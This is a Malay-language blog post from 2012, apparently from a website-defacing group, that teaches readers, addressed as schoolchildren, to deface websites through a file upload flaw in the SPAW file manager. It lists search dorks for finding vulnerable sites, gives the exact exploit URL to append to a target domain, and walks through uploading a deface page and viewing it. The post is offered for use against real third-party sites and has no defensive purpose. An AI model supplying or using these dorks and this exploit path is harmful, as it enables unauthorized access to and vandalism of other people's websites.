Thursday, 5 January 2012

SPAW File Manager - File Upload Vulnerability



Assalamualaikum dan salam sejahtera...amacam sekolah??best??huhu...untuk menceriakan korang.jom belajar exploit deface baru.Credit to NoEntry Phc untuk exploit ni.Sebelum tu CLICK SINI

1. Macam biasa cari web vuln guna salah satu dork dibawah :

  1. inurl:Spaw2/dialogs/ 
  2. Inurl:spaw2/uploads/files \
  3. Index of:/Spaw2/uploads/files
note : ubahsuai dork untuk mendapatkan hasil yg mantap. ;)
Korang akan dapat result seperti ni :

"Index of/ spaw2/dialogs/" 
atau 
www.site.com/abc/spaw2/uploads/files/abc/abc.pdf

Bukak salah satu website.

2. Selepas itu,masukkan link exploit dibawah dan tekan enter :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Masukkan di hujung url website.ia akan jadi macam ni :

www.target.com/
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

3. Seterusnya akan keluar seperti dibawah :



  1. Click dekat anak panah menurun untuk tukar directory(rujuk gambar).
  2. Kemudian tekan Choose File untuk pilih file anda.
  3. Selepas itu tekan Upload untuk upload deface anda.
note : selalunya korang boleh upload file html di dalam directory Files.

4. Untuk melihat hasil,setelah berjaya upload akan tertera preview di panel sebelah kanan.
Akan tertera perkataan "Download File".Click ini dan akan terbuka satu tab baru dan akan terpapar la deface korang!!
Rujuk gambar bawah :



DONE!!!

Item Reviewed: SPAW File Manager - File Upload Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com